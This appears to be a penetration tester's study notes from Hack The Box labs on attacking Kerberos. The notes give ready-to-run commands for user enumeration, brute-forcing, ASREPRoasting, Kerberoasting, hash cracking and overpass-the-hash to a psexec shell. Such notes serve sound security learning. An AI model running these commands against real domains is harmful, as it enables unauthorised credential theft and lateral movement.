Backlink: reference-notes-readme

Kerberos Overview

Enum Commands

To enumerate users with nmap's user list:

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICALBANK -oN "/root/cybersecurity/htb/boxes/10.10.10.175-sauna/scans/tcp_88_krb5-enum-users_nmap.txt" 10.10.10.175

To enumerate users with a custom user list:

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICALBANK',userdb=/root/cybersecurity/htb/boxes/10.10.10.175-sauna/users.txt -oN "/root/cybersecurity/htb/boxes/10.10.10.175-sauna/scans/tcp_88_krb5-enum-users_nmap.txt" 10.10.10.175

Kerberos Attacks

Kerberos Brute Force

The kerbrute tool (GitHub - TarlogicSecurity/kerbrute: An script to perform kerberos bruteforcing by using impacket) can be used to perform a brute-force attack from Kali. The tool can be installed with:

pip3 install kerbrute

To execute a brute-force attack against the Kerberos server:

kerbrute -dc-ip 10.10.10.182 -domain cascade.local -users users.txt -passwords /usr/share/wordlists/rockyou.utf8.txt -outputfile cascade_passwords.txt

Performing an ASREPRoast Attack

This attack looks for users without Kerberos pre-authentication required. This means that anyone can send an AS_REQ request to the KDC on behalf of any of these users, and receive and AS_REP message. This kind of message contains a chunk of data encrypted with the original user key, derived from its password. We can then use this to crack the password offline.

No domain account is required to perform this attack, only a connection to the KDC.

The impacket GetNPUsers.py script can be used to harvest the non-preauth AS_REP responses.

In order to run using a username list:

python3 /var/lib/impacket/examples/GetNPUsers.py cascade.local/ -dc-ip 10.10.10.182 -no-pass -usersfile ../users.txt

If you have domain credentials you can query to obtain a list of users:

python3 /var/lib/impacket/examples/GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -dc-ip 10.10.10.182 -request -format hashcat -outputfile hashes.asreproast

Once the AS_REP messages are obtained we can crack them using Hashcat or John.

hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Kerberoasting

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD environment. The only requirement is a domain account that can request for TGSs, which is anyone really because no special privileges are required. Once again we will be using impacket scripts to execute this attack from Kali.

python GetUserSPNs.py jurassic.park/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast

We then crack the TGS with Hashcat or JtR.

hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast

If you find this error from Linux:

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

It is because of your local time, you need to synchronize the host with the DC:

ntpdate <IP of DC>

Overpass the Hash/Pass the Key (PTK)

This attack aims to use user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.

In order to perform this attack, the NTLM hash (or password) of the target user account is needed. Thus, once a user hash is obtained, a TGT can be requested for that account. Finally, it is possible to access any service or machine where the user account has permissions. (I just used psexec.py in the example, something that might be better to pass the hash to would be a full shell like evil-winrm if it's available.)

python3 /var/lib/impacket/examples/getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7

export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache

psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

After generating and using the TGT, finally a shell is launched. The requested TGT can also be used with other impacket examples with parameter -k, and even with other tools (as smbexec.py or wmiexec.py) thanks to it being written in a ccache file, which is a widely used format for Kerberos tickets in Linux.

Pass The Ticket (PTT)

This kind of attack is similar to Pass the Key, but instead of using hashes to request for a ticket, the ticket itself is stolen and used to authenticate as its owner.

References

HTB Sauna/Kerberos PTH with Impacket's GetNPUsers

Kerberos (II): How to attack Kerberos?

Kerberos Cheatsheet (A cheatsheet with commands that can be used to perform kerberos attacks · GitHub)